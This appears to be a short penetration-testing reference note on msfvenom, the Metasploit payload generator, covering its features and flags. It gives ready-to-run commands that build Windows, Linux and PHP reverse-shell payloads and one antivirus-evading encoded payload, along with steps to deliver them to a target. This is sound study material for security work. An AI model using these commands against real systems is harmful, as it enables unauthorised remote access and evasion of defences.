Quartz 4

msfvenom

2 min read

MSFvenom is a command-line instance of the Metasploit Framework used to generate, encode, and customize payloads for penetration testing and ethical hacking. It replaced the older msfpayload and msfencode tools on June 8, 2015, combining their functionalities into a single, faster tool. It supports a wide range of platforms, including Windows, Linux, Android, and macOS.  Core Functionalities and Features

  • Payload Generation: 
    • Creates custom shellcode or executable files (e.g., .exe, .elf, .php, .war).
  • Encoding: 
    • Encodes payloads to evade Antivirus (AV) detection, such as using x86/shikata_ga_nai.
  • Platform Support: 
    • Supports various platforms like Windows, Linux, Android, Cisco, and Node.js.
  • Custom Templates:
    • Allows users to inject payloads into existing executable files using the -x flag
  • Bad Character Removal: 
    • Excludes specific characters that might break the payload, such as \x00 (null byte). 

Key Command Options

  • -p--payload: Specifies the payload to use.
  • -l--list: Lists modules (payloads, encoders, platforms).
  • -f--format: Specifies the output format (e.g., exe, raw, elf, php).
  • -e--encoder: Selects the encoder to use.
  • -a--arch: Specifies the architecture.
  • --platform: Specifies the platform.
  • -o--out: Saves the payload to a file.
  • -b--bad-chars: List of characters to avoid. 

Common Examples

  • Windows Meterpreter Reverse TCP:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
  • Linux Reverse Shell:
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
  • PHP Reverse Shell:
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
  • Encoded Payload (to evade AV):
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded_shell.exe

Use in Penetration Testing 

  1. Generate Payload: Create the malicious file with msfvenom.
  2. Setup Listener: Use msfconsole with exploit/multi/handler to receive the connection.
  3. Execute: Deliver and execute the payload on the target system.

clitool tools tool reverseshells evasion

Graph View